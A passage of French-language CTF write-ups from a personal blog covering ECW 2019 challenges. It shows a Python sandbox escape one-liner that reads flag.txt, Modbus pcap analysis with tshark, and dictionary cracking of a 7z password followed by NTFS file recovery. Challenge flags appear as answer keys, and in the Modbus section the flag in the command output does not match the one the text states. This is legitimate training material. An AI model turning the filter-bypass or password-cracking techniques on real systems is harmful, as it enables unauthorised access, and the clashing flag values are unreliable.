<span class="n">THE</span> <span class="n">MATRIX</span> <span class="o">>>></span> <span class="n">content</span> <span class="o">=</span> <span class="n">file</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
<span class="p">(</span><span class="err">⌐■</span><span class="n">_</span><span class="err">■</span><span class="p">)</span> <span class="o"><</span><span class="n">Agent</span> <span class="n">Smith</span><span class="o">></span><span class="p">:</span> <span class="n">Never</span> <span class="n">send</span> <span class="n">a</span> <span class="n">human</span> <span class="n">to</span> <span class="n">do</span> <span class="n">a</span> <span class="n">machine</span><span class="s1">'s job.</span>
</code></pre></div>
<p>Bon, on a découvert l'agent Smith. Il indique que nous n'allons pas dans la bonne direction. On reprends donc la commande pour faire le <code>print()</code> directement.</p>
<div class="highlight"><pre><span></span><code><span class="n">THE</span> <span class="n">MATRIX</span> <span class="o">>>></span> <span class="nb">print</span><span class="p">(</span><span class="n">a</span><span class="o">.</span><span class="n">modules</span><span class="p">[</span><span class="s2">"os"</span><span class="p">]</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="n">file</span><span class="p">,</span><span class="mi">1024</span><span class="p">))</span>
<span class="sa">b</span><span class="s1">'ECW</span><span class="si">{e394c808ed042215006a039a3fb5eb2dcd5ebddfdc20a2888a17284c3cd25c91}</span><span class="se">\n</span><span class="s1">'</span>
</code></pre></div>
<p>Et voila :). On a le flag de l'épreuve et les 75 points qui vont avec <3.</p>
<h2>Oneline</h2>
<p>Juste pour le swag d'avoir tout les commandes en une seule ;).</p>
<div class="highlight"><pre><span></span><code><span class="nb">print</span><span class="p">(</span><span class="nb">globals</span><span class="p">()[</span><span class="s2">"s"</span><span class="o">+</span><span class="s2">"ys"</span><span class="p">]</span><span class="o">.</span><span class="n">modules</span><span class="p">[</span><span class="s2">"os"</span><span class="p">]</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="nb">globals</span><span class="p">()[</span><span class="s2">"s"</span><span class="o">+</span><span class="s2">"ys"</span><span class="p">]</span><span class="o">.</span><span class="n">modules</span><span class="p">[</span><span class="s2">"os"</span><span class="p">]</span><span class="o">.</span><span class="n">open</span><span class="p">(</span><span class="s2">"flag.txt"</span><span class="p">,</span><span class="mi">0</span><span class="p">),</span><span class="mi">1024</span><span class="p">))</span>
</code></pre></div>ECW - Puzzle2019-10-16T00:00:00+02:002019-10-16T00:00:00+02:00nlegalltag:blog.nlegall.fr,2019-10-16:/ecw-puzzle.html<p><em>File : <a href="https://blog.nlegall.fr/files/ecw/puzzle.pcap">puzzle.pcap</a></em></p>
<h2>GUI</h2>
<p>SCADA/Modbus</p>
<p><img alt="puzzle_1.png" src="https://blog.nlegall.fr/images/ecw/puzzle_1.png"></p>
<p>Bon, n'ayant (pour l'instant) aucune connaissance sur ModBus ou SCADA, on commence par suivre le flux TCP (ce protocole utilisant TCP) afin d'avoir un visu sur l'ensemble des données qui ont été enregistrées.</p>
<p>On sait également que le flag respecte la nomenclature suivante : <code>ECW …</code></p><p><em>File : <a href="https://blog.nlegall.fr/files/ecw/puzzle.pcap">puzzle.pcap</a></em></p>
<h2>GUI</h2>
<p>SCADA/Modbus</p>
<p><img alt="puzzle_1.png" src="https://blog.nlegall.fr/images/ecw/puzzle_1.png"></p>
<p>Bon, n'ayant (pour l'instant) aucune connaissance sur ModBus ou SCADA, on commence par suivre le flux TCP (ce protocole utilisant TCP) afin d'avoir un visu sur l'ensemble des données qui ont été enregistrées.</p>
<p>On sait également que le flag respecte la nomenclature suivante : <code>ECW{64 char hexa}</code>.</p>
<p>On peut donc chercher tout les <code>{</code> dans cet échange par exemple :</p>
<div class="highlight"><pre><span></span><code>........N)...................N#.5..................Y...........Y...........b.....................N*....................n.v.........n.v.........a...........a...........d...........d... .......s... ..........
.......p...
..................n............v...........6...........6.
.......c.m.
.......c.m.........k.X.........k.X.........V............v........N(....................s.2.........s.2.........O.4.........O.4........._............C.........c...........c..........N,.S.................N&....................d...........d...........c.3.........c.3........N2....................B.C.........B.C.........R......................`.4.........`.4.........s...........s.............7...........7.........i............k. .......q... ........U.!.......o.2.!.......o.2.".......V...".......V...#.......l.7.#.......l.7.$.......z.8.$.......z.8.%.......W...%........V.&.......U.1.&.......U.1.'.......k.f.'.......k.f.(.......a...(..........).......I.d.).......I.d.*......N0...*........+......._.1.+......._.1.,.......b.e.,.......b.e.-.......X...-.......X...........]...........].../......N3.../........0......N-...0........1.......g.b.1.......g.b.2.......t.8.2.......t.8.3.......r.f.3.......r.f.4.......o.*.4.......o.*.5......._.a.5......._.a.6......N..F.6........7......N!...7........8.......\...8.......\...9......N2...9........:.......U...:..........;.......Z...;.......Z...<.......}.b.<.......}.b.=.......c...=.......c...>.......Y...>.......Y...?.......r...?........q.@.......h...@.......h...A.......r...A.......r...B.......j.+.B.......j.+.C......N#...C........D......N*...D........E.......t...E..........F.......Q...F.......Q...G.......V.1.G.......V.1.H.......q...H........U.I.......[...I..........J......._...J......._...K......N(.`.K........L.......b.K.L.......b.K.M.......d. .M.......d. .N......N!...N........O......N&...O........P.......l...P........l.Q.......n.c.Q.......n.c.R.......W.`.R.......W.`.S.......q.2.S.......q.2.T.......i...T.......i...U.......A.E.U.......A.E.V.......|.6.V.......|.6.W.......a...W.......a...X......N&...X........Y.......Z...Y..........Z.......].3.Z.......].3.[......N(...[........\.......Z...\..........]......N2...]........^......N4...^........_.......u.a._.......u.a.`.......V...`.......V...a......N-...a........b.......S...b........h.c......N-...c........d.......X.a.d.......X.a.e.......^...e........3.f.......^.f.f.......^.f.g.......i.3.g.......i.3.h.......`.5.h.......`.5.i.......h.e.i.......h.e.j......N4...j........k.........2.k.........2.l.......W...l.......W...m.......o.O.m.......o.O.n.......\.a.n.......\.a.o.......a...o..........p......N!...p........q.........1.q.........1.r.......d...r........ .s.........}.s.........}.t.........7.t.........7.u.......b.B.u.......b.B.v......N2.V.v........w......N%...w........x.......o...x.......o...y.......Y.0.y.......Y.0.z.......b...z........K.{.......[...{.......[...|.......d...|.......d...}......N*...}........~.......T.4.~.......T.4.........b............B........N2....................p......................a.n.........a.n.........M.a.........M.a.........].....................N0.F..................x.4.........x.4.........a......................~.6.........~.6........N$....................d.c.........d.c........N....................N#....................X......................b............B.........d.9.........d.9.........e......................t......................a...........a..........N/.c..................E.e.........E.e.........w.7.........w.7.........{.c.........{.c........N%...................N%....................Z......................f.3.........f.3.........c......................\.(.........\.(.........Q.6.........Q.6.........W......................P.5.........P.5........N*....................N.f.........N.f.........j.3.........j.3...........3...........3.........m............\.........m.5.........m.5.........C.W.........C.W.........d............c........N.....................e......................p.....................N0....................K.0.........K.0........N/....................\...........\...........a.a.........a.a.........y.2.........y.2........N'....................r......................i......................m...........m...........`............5.........p.8.........p.8........N*....................l...........l..........N%....................i...........i...........F.a.........F.a.........e.0.........e.0.........\.D.........\.D.........r...........r...........b...........b...........R.....................N2....................R.Q.........R.Q.........d............c.........n............v.........f............F.........R.0.........R.0.........r...........r..........N$.R..................H.4.........H.4.........U......................Y.....................N"....................U.{.........U.{........N#....................v.0.........v.0.........Z.7.........Z.7.........Y...........Y...........J.b.........J.b........N2.2..................[.9.........[.9.........D.{.........D.{.........U............{........N)....................G.6.........G.6.........W.1.........W.1........N2.N..................m.....................N#....................b.....................N*....................T...........T..........N0....................`...........`...........S.0.........S.0.........e......................L.8.........L.8
</code></pre></div>
<p>On compte 9 occurrences en tout. Pour chacune d'entre elles, on peut donc regarder le caractère correspondant à l'échange précédent et voir si c'est un <code>W</code>.</p>
<p>Afin de savoir comment les échanges se font avec ModBus, on regarde la partie ModBus de WireShark :</p>
<p><img alt="puzzle_2.png" src="https://blog.nlegall.fr/images/ecw/puzzle_2.png"></p>
<p>On voit un <code>Transaction Identifier</code> et <code>Reference Number</code> qui pourrait nous donner l'ordre des trames. En regardant le guide d'implémentation, on lit l'information suivante :</p>
<ul>
<li>Transaction Identifier : 2 Bytes - Identification of a MODBUS Request / Response transaction - Initialized by the client - Recopied by the server from the received req</li>
</ul>
<p>Hum, c'est pas super concluant. On peut essayer avec l'autre champ du coup. On cherche alors les références des paquets avec le caractère '{' en tant que data, soit :</p>
<ul>
<li>50005</li>
<li>40004</li>
</ul>
<p>On regarde les paquets ayant pour références 50004 et 40003 :</p>
<p><img alt="puzzle_3.png" src="https://blog.nlegall.fr/images/ecw/puzzle_3.png"></p>
<p>YEAH ! On a donc le <code>W{</code> du flag. On remonte donc deux autres trames en arrière et on poursuit jusqu'à l'obtention de <code>}</code> indiquant la fin du flag.</p>
<p>Le début commence à la référence <code>40001</code> et se termine à <code>40069</code> : les 64 caractères du flag et la nomenclature.</p>
<h2>CLI</h2>
<div class="highlight"><pre><span></span><code>$ tshark -r puzzle.pcap -O Modbus/TCP -T fields -e modbus.reference_num -e modbus.data <span class="p">|</span> sort -u <span class="p">|</span> awk -F <span class="s1">' '</span> <span class="s1">'{print $2}'</span> <span class="p">|</span> sed <span class="s1">':a;N;$!ba;s/\n//g'</span> <span class="p">|</span> xxd -r -p
���5�R����<span class="sb">`</span>�
��ScF�2NV�ECW<span class="o">{</span>ea64db08af456004111a079a3fa4ae3903be33f75c282f28a07428c6b6727631<span class="o">}</span>�Q�<span class="o">{</span>��<span class="sb">`</span>�������<span class="o">(</span>D���5��K� ��n��Bmc���+X�v*O�����%
</code></pre></div>
<p>On a donc notre flag en clair au milieu du reste : <code>ECW{553d8f4dfb452545515a47da7ae1ee7d649d97ddada0a520288a20461e707cb9}</code>.</p>
<h2>Référence</h2>
<p>https://en.wikipedia.org/wiki/Modbus
http://jamod.sourceforge.net/kbase/protocol.html
http://www.modbus.org/docs/Modbus_Messaging_Implementation_Guide_V1_0b.pdf</p>ECW - NTFS2019-10-10T00:00:00+02:002019-10-10T00:00:00+02:00nlegalltag:blog.nlegall.fr,2019-10-10:/ecw-ntfs.html<p>On récupère pour ce challenge un fichier compressé via 7zip. On peut donc l'ouvrir mais on obtiens une demande de mot de passe :</p>
<div class="highlight"><pre><span></span><code>$ 7z e ntfs.7z
<span class="m">7</span>-Zip <span class="o">[</span><span class="m">64</span><span class="o">]</span> <span class="m">16</span>.02 : Copyright <span class="o">(</span>c<span class="o">)</span> <span class="m">1999</span>-2016 Igor Pavlov : <span class="m">2016</span>-05-21
p7zip Version <span class="m">16</span>.02 <span class="o">(</span><span class="nv">locale</span><span class="o">=</span>fr_FR.UTF-8,Utf16<span class="o">=</span>on,HugeFiles …</code></pre></div><p>On récupère pour ce challenge un fichier compressé via 7zip. On peut donc l'ouvrir mais on obtiens une demande de mot de passe :</p>
<div class="highlight"><pre><span></span><code>$ 7z e ntfs.7z
<span class="m">7</span>-Zip <span class="o">[</span><span class="m">64</span><span class="o">]</span> <span class="m">16</span>.02 : Copyright <span class="o">(</span>c<span class="o">)</span> <span class="m">1999</span>-2016 Igor Pavlov : <span class="m">2016</span>-05-21
p7zip Version <span class="m">16</span>.02 <span class="o">(</span><span class="nv">locale</span><span class="o">=</span>fr_FR.UTF-8,Utf16<span class="o">=</span>on,HugeFiles<span class="o">=</span>on,64 bits,8 CPUs Intel<span class="o">(</span>R<span class="o">)</span> Core<span class="o">(</span>TM<span class="o">)</span> i7-8550U CPU @ <span class="m">1</span>.80GHz <span class="o">(</span>806EA<span class="o">)</span>,ASM,AES-NI<span class="o">)</span>
Scanning the drive <span class="k">for</span> archives:
<span class="m">1</span> file, <span class="m">28439786</span> bytes <span class="o">(</span><span class="m">28</span> MiB<span class="o">)</span>
Extracting archive: ntfs.7z
--
<span class="nv">Path</span> <span class="o">=</span> ntfs.7z
<span class="nv">Type</span> <span class="o">=</span> 7z
Physical <span class="nv">Size</span> <span class="o">=</span> <span class="m">28439786</span>
Headers <span class="nv">Size</span> <span class="o">=</span> <span class="m">170</span>
<span class="nv">Method</span> <span class="o">=</span> LZMA2:26 7zAES
<span class="nv">Solid</span> <span class="o">=</span> -
<span class="nv">Blocks</span> <span class="o">=</span> <span class="m">1</span>
Enter password <span class="o">(</span>will not be echoed<span class="o">)</span>:
</code></pre></div>
<p>On doit donc commencer par trouver ce mot de passe. On peut cependant lister le contenu de l'archive et y voir le contenu :</p>
<div class="highlight"><pre><span></span><code>$ 7z l ntfs.7z
<span class="m">7</span>-Zip <span class="o">[</span><span class="m">64</span><span class="o">]</span> <span class="m">16</span>.02 : Copyright <span class="o">(</span>c<span class="o">)</span> <span class="m">1999</span>-2016 Igor Pavlov : <span class="m">2016</span>-05-21
p7zip Version <span class="m">16</span>.02 <span class="o">(</span><span class="nv">locale</span><span class="o">=</span>fr_FR.UTF-8,Utf16<span class="o">=</span>on,HugeFiles<span class="o">=</span>on,64 bits,8 CPUs Intel<span class="o">(</span>R<span class="o">)</span> Core<span class="o">(</span>TM<span class="o">)</span> i7-8550U CPU @ <span class="m">1</span>.80GHz <span class="o">(</span>806EA<span class="o">)</span>,ASM,AES-NI<span class="o">)</span>
Scanning the drive <span class="k">for</span> archives:
<span class="m">1</span> file, <span class="m">28439786</span> bytes <span class="o">(</span><span class="m">28</span> MiB<span class="o">)</span>
Listing archive: ntfs.7z
--
<span class="nv">Path</span> <span class="o">=</span> ntfs.7z
<span class="nv">Type</span> <span class="o">=</span> 7z
Physical <span class="nv">Size</span> <span class="o">=</span> <span class="m">28439786</span>
Headers <span class="nv">Size</span> <span class="o">=</span> <span class="m">170</span>
<span class="nv">Method</span> <span class="o">=</span> LZMA2:26 7zAES
<span class="nv">Solid</span> <span class="o">=</span> -
<span class="nv">Blocks</span> <span class="o">=</span> <span class="m">1</span>
Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
<span class="m">2019</span>-03-25 <span class="m">17</span>:09:16 ....A <span class="m">2684354560</span> <span class="m">28439616</span> for_medium.img
------------------- ----- ------------ ------------ ------------------------
<span class="m">2019</span>-03-25 <span class="m">17</span>:09:16 <span class="m">2684354560</span> <span class="m">28439616</span> <span class="m">1</span> files
</code></pre></div>
<p>On commence avec johntheripper pour trouver le mot de passe. Il faut cependant utiliser un script afin de lui donner le hash pourqu'il puisse travailler dessus. On trouve facilement <a href="https://github.com/truongkma/ctf-tools/blob/master/John/run/7z2john.py">7z2john</a> :</p>
<div class="highlight"><pre><span></span><code>$ python2 7z2john.py ntfs.7z
ntfs.7z : <span class="m">7</span>-Zip files without header encryption are *not* supported yet!
</code></pre></div>
<p>Ok, échec critique. On peut tenter avec hashcat. On aura peut-être plus de chance. Idem, trouve un script, <a href="https://github.com/philsmd/7z2hashcat">7z2hashcat</a>, pour générer le hash :</p>
<div class="highlight"><pre><span></span><code>perl 7z2hashcat.pl ntfs.7z
WARNING: the file <span class="s1">'ntfs.7z'</span> unfortunately can<span class="err">'</span>t be used with hashcat since the data length
in this particular <span class="k">case</span> is too long <span class="o">(</span><span class="m">28439616</span> of the maximum allowed <span class="m">327528</span> bytes<span class="o">)</span>.
</code></pre></div>
<p>Double échec.</p>
<p>On part donc à la recherche d'un autre outil. En cherchant, on trouve <a href="https://kraken.nswardh.com/">Kraken</a>. Outil Windows permettant de brute-force un mot de passe sur une archive à partir d'un dictionnaire. On récupère l'exécutable et le dictionnaire rockyou.</p>
<p>On le lance, on patiente et HOP. On a notre mot de passe qui s'affiche :</p>
<p><img alt="ntfs_1.png" src="https://blog.nlegall.fr/images/ecw/ntfs_1.png"></p>
<p>Parfait ! On a donc notre mot de passe et on peut enfin avoir son contenu.</p>
<p>C'est une image disque. On peut donc l'ouvrir avec <code>testdisk</code> pour y explorer le contenu :</p>
<div class="highlight"><pre><span></span><code>TestDisk <span class="m">7</span>.0, Data Recovery Utility, April <span class="m">2015</span>
Christophe GRENIER <grenier@cgsecurity.org>
http://www.cgsecurity.org
TestDisk is free software, and
comes with ABSOLUTELY NO WARRANTY.
Select a media <span class="o">(</span>use Arrow keys, <span class="k">then</span> press Enter<span class="o">)</span>:
>Disk for_medium.img - <span class="m">2684</span> MB / <span class="m">2560</span> MiB
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="n">Please</span> <span class="n">select</span> <span class="n">the</span> <span class="n">partition</span> <span class="n">table</span> <span class="n">type</span><span class="p">,</span> <span class="n">press</span> <span class="n">Enter</span> <span class="n">when</span> <span class="n">done</span><span class="p">.</span>
<span class="p">[</span><span class="n">Intel</span> <span class="p">]</span> <span class="n">Intel</span><span class="o">/</span><span class="n">PC</span> <span class="n">partition</span>
<span class="p">[</span><span class="n">EFI</span> <span class="n">GPT</span><span class="p">]</span> <span class="n">EFI</span> <span class="n">GPT</span> <span class="n">partition</span> <span class="n">map</span> <span class="p">(</span><span class="n">Mac</span> <span class="n">i386</span><span class="p">,</span> <span class="n">some</span> <span class="n">x86_64</span><span class="p">...)</span>
<span class="p">[</span><span class="n">Humax</span> <span class="p">]</span> <span class="n">Humax</span> <span class="n">partition</span> <span class="n">table</span>
<span class="p">[</span><span class="n">Mac</span> <span class="p">]</span> <span class="n">Apple</span> <span class="n">partition</span> <span class="n">map</span>
<span class="o">></span><span class="p">[</span><span class="n">None</span> <span class="p">]</span> <span class="n">Non</span> <span class="n">partitioned</span> <span class="n">media</span>
<span class="p">[</span><span class="n">Sun</span> <span class="p">]</span> <span class="n">Sun</span> <span class="n">Solaris</span> <span class="n">partition</span>
<span class="p">[</span><span class="n">XBox</span> <span class="p">]</span> <span class="n">XBox</span> <span class="n">partition</span>
<span class="p">[</span><span class="n">Return</span> <span class="p">]</span> <span class="n">Return</span> <span class="n">to</span> <span class="n">disk</span> <span class="n">selection</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="err"> [ Analyse ] Analyse current partition structure and search for lost partitions</span>
<span class="err">>[ Advanced ] Filesystem Utils</span>
<span class="err"> [ Geometry ] Change disk geometry</span>
<span class="err"> [ Options ] Modify options</span>
<span class="err"> [ Quit ] Return to disk selection</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="err"> Partition Start End Size in sectors</span>
<span class="err">> P NTFS 0 0 1 326 90 20 5242880</span>
</code></pre></div>
<p>On prend <code>List</code></p>
<div class="highlight"><pre><span></span><code><span class="err">>dr-xr-xr-x 0 0 0 25-Mar-2019 14:07 .</span>
<span class="err"> dr-xr-xr-x 0 0 0 25-Mar-2019 14:07 ..</span>
<span class="err"> dr-xr-xr-x 0 0 0 25-Mar-2019 16:10 .download</span>
<span class="err"> dr-xr-xr-x 0 0 0 22-Mar-2019 17:54 divers</span>
<span class="err"> dr-xr-xr-x 0 0 0 22-Mar-2019 17:54 reseau</span>
<span class="err"> dr-xr-xr-x 0 0 0 22-Mar-2019 17:54 windows</span>
<span class="err"> -r--r--r-- 0 0 752146 22-Mar-2019 17:54 guide-charte-utilisation-moyens-informatiques-outils-numeriques_anssi.pdf</span>
<span class="err"> -r--r--r-- 0 0 2659730 22-Mar-2019 17:54 guide-methode-ebios-risk-manager.pdf</span>
<span class="err"> -r--r--r-- 0 0 661506 22-Mar-2019 17:54 guide_802.1x_anssi_pa_043_v1.pdf</span>
<span class="err"> -r--r--r-- 0 0 1761720 22-Mar-2019 17:54 guide_admin_securisee_si_anssi_pa_022_v2.pdf</span>
<span class="err"> -r--r--r-- 0 0 495875 22-Mar-2019 17:54 guide_cloisonnement_systeme_anssi_pg_040_v1.pdf</span>
<span class="err"> -r--r--r-- 0 0 4793303 22-Mar-2019 17:54 guide_hygiene_informatique_anssi.pdf</span>
<span class="err"> -r--r--r-- 0 0 1002452 22-Mar-2019 17:54 guide_sns_anssi_bp_031_v.2.0.pdf</span>
<span class="err"> -r--r--r-- 0 0 180 25-Mar-2019 11:14 liens_utiles.txt</span>
<span class="err"> -r--r--r-- 0 0 225 25-Mar-2019 11:14 liens_utiles.txt~</span>
<span class="err"> -r--r--r-- 0 0 997307 22-Mar-2019 17:54 linux_configuration-fr-v1.2.pdf</span>
<span class="err"> -r--r--r-- 0 0 188936 22-Mar-2019 17:54 np_cryhod_notetech.pdf</span>
<span class="err"> -r--r--r-- 0 0 0 22-Mar-2019 17:29 tmp</span>
<span class="err"> -r--r--r-- 0 0 36 22-Mar-2019 17:54 tools.pdf</span>
</code></pre></div>
<p>On voit un dossier <code>.download</code> qui semble prometteur :</p>
<div class="highlight"><pre><span></span><code><span class="n">Directory</span> <span class="o">/</span><span class="p">.</span><span class="n">download</span>
<span class="o">></span><span class="n">dr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="mi">0</span> <span class="mi">0</span> <span class="mi">0</span> <span class="mi">25</span><span class="o">-</span><span class="n">Mar</span><span class="o">-</span><span class="mi">2019</span> <span class="mi">16</span><span class="p">:</span><span class="mi">10</span> <span class="p">.</span>
<span class="n">dr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="mi">0</span> <span class="mi">0</span> <span class="mi">0</span> <span class="mi">25</span><span class="o">-</span><span class="n">Mar</span><span class="o">-</span><span class="mi">2019</span> <span class="mi">14</span><span class="p">:</span><span class="mi">07</span> <span class="p">..</span>
<span class="o">-</span><span class="n">r</span><span class="c1">--r--r-- 0 0 374318 22-Mar-2019 18:05 27158365900_6d256cfae8_h.jpg</span>
<span class="o">-</span><span class="n">r</span><span class="c1">--r--r-- 0 0 77140 25-Mar-2019 15:42 ECW_flag_test.jpg</span>
<span class="o">-</span><span class="n">r</span><span class="c1">--r--r-- 0 0 3136473 22-Mar-2019 18:05 Red_Kitten_01.jpg</span>
<span class="o">-</span><span class="n">r</span><span class="c1">--r--r-- 0 0 64526 25-Mar-2019 15:44 clue.jpg</span>
<span class="o">-</span><span class="n">r</span><span class="c1">--r--r-- 0 0 108838 25-Mar-2019 15:42 example.jpg</span>
</code></pre></div>
<p>On regarde alors nos fichiers images :</p>
<p><img alt="ntfs_clue1.jpg" src="https://blog.nlegall.fr/images/ecw/ntfs_clue1.jpg"></p>
<p><img alt="ntfs_clue2.jpg" src="https://blog.nlegall.fr/images/ecw/ntfs_clue2.jpg"></p>
<p><img alt="ntfs_clue3.jpg" src="https://blog.nlegall.fr/images/ecw/ntfs_clue3.jpg"></p>
<p>Pas super concluant, mais très bon humour de la part du créateur ;).</p>
<p>Voyons voir du coup du côté des fichiers supprimés mais récupérable. On sélectionne <code>undelete</code> dans le menu du bas :</p>
<div class="highlight"><pre><span></span><code><span class="n">Deleted</span> <span class="n">files</span>
<span class="o">></span><span class="p">.</span><span class="o">/</span><span class="mi">3590</span><span class="n">F75ABA9E485486C100C1A9D4FF06NKQITXGIIGQUSKWT</span> <span class="mi">25</span><span class="o">-</span><span class="n">Mar</span><span class="o">-</span><span class="mi">2019</span> <span class="mi">14</span><span class="p">:</span><span class="mi">07</span> <span class="mi">261795840</span>
<span class="o">/</span><span class="p">.</span><span class="n">download</span><span class="o">/</span><span class="n">ECW_flag</span><span class="p">.</span><span class="n">jpg</span> <span class="mi">25</span><span class="o">-</span><span class="n">Mar</span><span class="o">-</span><span class="mi">2019</span> <span class="mi">15</span><span class="p">:</span><span class="mi">42</span> <span class="mi">52746</span>
<span class="o">/</span><span class="p">.</span><span class="n">download</span><span class="o">/</span><span class="n">methodology</span><span class="p">.</span><span class="n">jpg</span> <span class="mi">25</span><span class="o">-</span><span class="n">Mar</span><span class="o">-</span><span class="mi">2019</span> <span class="mi">15</span><span class="p">:</span><span class="mi">43</span> <span class="mi">113105</span>
<span class="o">/</span><span class="p">.</span><span class="n">download</span><span class="o">/</span><span class="n">special_kitten</span><span class="p">.</span><span class="n">png</span> <span class="mi">25</span><span class="o">-</span><span class="n">Mar</span><span class="o">-</span><span class="mi">2019</span> <span class="mi">16</span><span class="p">:</span><span class="mi">08</span> <span class="mi">1688578</span>
<span class="o">/</span><span class="p">.</span><span class="n">download</span><span class="o">/</span><span class="n">toto</span><span class="p">.</span><span class="n">png</span> <span class="mi">25</span><span class="o">-</span><span class="n">Mar</span><span class="o">-</span><span class="mi">2019</span> <span class="mi">13</span><span class="p">:</span><span class="mi">15</span> <span class="mi">1688536</span>
<span class="o">/</span><span class="p">.</span><span class="n">download</span><span class="o">/</span><span class="n">toto</span><span class="p">.</span><span class="n">png</span><span class="p">:</span><span class="n">ads</span> <span class="mi">25</span><span class="o">-</span><span class="n">Mar</span><span class="o">-</span><span class="mi">2019</span> <span class="mi">13</span><span class="p">:</span><span class="mi">15</span> <span class="mi">7</span>
<span class="n">Z</span><span class="p">..</span><span class="n">Z</span><span class="p">..</span><span class="n">ZZ</span><span class="p">...</span><span class="n">Z</span><span class="p">..</span><span class="n">ZZ</span><span class="o">/</span><span class="n">Z</span><span class="p">....</span><span class="n">ZZZ</span><span class="p">.</span><span class="n">ZZ</span><span class="p">.</span><span class="n">ZZZZ</span> <span class="mi">25</span><span class="o">-</span><span class="n">Mar</span><span class="o">-</span><span class="mi">2019</span> <span class="mi">14</span><span class="p">:</span><span class="mi">06</span> <span class="mi">592</span>
<span class="n">Z</span><span class="p">..</span><span class="n">Z</span><span class="p">..</span><span class="n">ZZ</span><span class="p">...</span><span class="n">Z</span><span class="p">..</span><span class="n">ZZ</span><span class="o">/</span><span class="n">Z</span><span class="p">...</span><span class="n">Z</span><span class="p">..</span><span class="n">ZZ</span><span class="p">..</span><span class="n">Z</span><span class="p">.</span><span class="n">ZZZ</span> <span class="mi">25</span><span class="o">-</span><span class="n">Mar</span><span class="o">-</span><span class="mi">2019</span> <span class="mi">14</span><span class="p">:</span><span class="mi">06</span> <span class="mi">600</span>
<span class="n">Z</span><span class="p">..</span><span class="n">Z</span><span class="p">..</span><span class="n">ZZ</span><span class="p">...</span><span class="n">Z</span><span class="p">..</span><span class="n">ZZ</span><span class="o">/</span><span class="n">Z</span><span class="p">..</span><span class="n">Z</span><span class="p">....</span><span class="n">Z</span><span class="p">.</span><span class="n">Z</span><span class="p">...</span><span class="n">ZZ</span> <span class="mi">25</span><span class="o">-</span><span class="n">Mar</span><span class="o">-</span><span class="mi">2019</span> <span class="mi">14</span><span class="p">:</span><span class="mi">06</span> <span class="mi">600</span>
<span class="p">[...]</span>
<span class="n">Z</span><span class="p">..</span><span class="n">Z</span><span class="p">..</span><span class="n">ZZ</span><span class="p">...</span><span class="n">Z</span><span class="p">..</span><span class="n">ZZ</span><span class="o">/</span><span class="n">Z</span><span class="p">..</span><span class="n">Z</span><span class="p">..</span><span class="n">Z</span><span class="p">..</span><span class="n">ZZZZ</span><span class="p">.</span><span class="n">ZZ</span> <span class="mi">25</span><span class="o">-</span><span class="n">Mar</span><span class="o">-</span><span class="mi">2019</span> <span class="mi">14</span><span class="p">:</span><span class="mi">06</span> <span class="mi">600</span>
<span class="n">Z</span><span class="p">..</span><span class="n">Z</span><span class="p">..</span><span class="n">ZZ</span><span class="p">...</span><span class="n">Z</span><span class="p">..</span><span class="n">ZZ</span><span class="o">/</span><span class="n">ZZZZ</span><span class="p">.</span><span class="n">ZZ</span><span class="p">.</span><span class="n">ZZ</span><span class="p">.....</span><span class="n">Z</span> <span class="mi">25</span><span class="o">-</span><span class="n">Mar</span><span class="o">-</span><span class="mi">2019</span> <span class="mi">14</span><span class="p">:</span><span class="mi">06</span> <span class="mi">600</span>
</code></pre></div>
<p>Ok. On a donc bien d'autres images à récupérer. On les extraits depuis l'image sur le poste en local.</p>
<div class="highlight"><pre><span></span><code>$ ls -al
total <span class="m">3480</span>
drwxr-xr-x <span class="m">2</span> nlegall nlegall <span class="m">4096</span> oct. <span class="m">24</span> <span class="m">12</span>:58 .
drwxr-xr-x <span class="m">3</span> nlegall nlegall <span class="m">4096</span> oct. <span class="m">24</span> <span class="m">12</span>:57 ..
-rw------- <span class="m">1</span> nlegall nlegall <span class="m">52746</span> mars <span class="m">25</span> <span class="m">2019</span> ECW_flag.jpg
-rw------- <span class="m">1</span> nlegall nlegall <span class="m">113105</span> mars <span class="m">25</span> <span class="m">2019</span> methodology.jpg
-rw------- <span class="m">1</span> nlegall nlegall <span class="m">1688578</span> mars <span class="m">25</span> <span class="m">2019</span> special_kitten.png
-rw------- <span class="m">1</span> nlegall nlegall <span class="m">1688536</span> mars <span class="m">25</span> <span class="m">2019</span> toto.png
-rw------- <span class="m">1</span> nlegall nlegall <span class="m">7</span> mars <span class="m">25</span> <span class="m">2019</span> toto.png:ads
</code></pre></div>
<p>Le fichier <code>special_kitten.png</code> ayant la plus grande taille, on peut commencer par celui-là. Fichier image dit méta-données. On utilise la commande <code>exiftool</code> pour les lister :</p>
<div class="highlight"><pre><span></span><code>$ exiftool special_kitten.png
ExifTool Version Number : <span class="m">11</span>.70
File Name : special_kitten.png
Directory : .
File Size : <span class="m">1649</span> kB
File Modification Date/Time : <span class="m">2019</span>:03:25 <span class="m">16</span>:08:52+01:00
File Access Date/Time : <span class="m">2019</span>:03:25 <span class="m">16</span>:08:52+01:00
File Inode Change Date/Time : <span class="m">2019</span>:10:24 <span class="m">12</span>:58:30+02:00
File Permissions : rw-------
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : <span class="m">8000</span>
Image Height : <span class="m">4500</span>
Bit Depth : <span class="m">8</span>
Color Type : RGB with Alpha
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Pixels Per Unit X : <span class="m">11811</span>
Pixels Per Unit Y : <span class="m">11811</span>
Pixel Units : meters
Warning : <span class="o">[</span>minor<span class="o">]</span> Text chunk<span class="o">(</span>s<span class="o">)</span> found after PNG IDAT <span class="o">(</span>may be ignored by some readers<span class="o">)</span>
Artist : calculate Message Digest <span class="m">5</span> of file and add one
Image Size : 8000x4500
Megapixels : <span class="m">36</span>.0
</code></pre></div>
<p>YEAH ! Un indice sur le flag apparaît alors dans le champ <code>Artist</code>. On exécute alors les indications :</p>
<div class="highlight"><pre><span></span><code>$ md5sum special_kitten.png
3d9382f08cd82a430a59343b21934752 special_kitten.png
</code></pre></div>
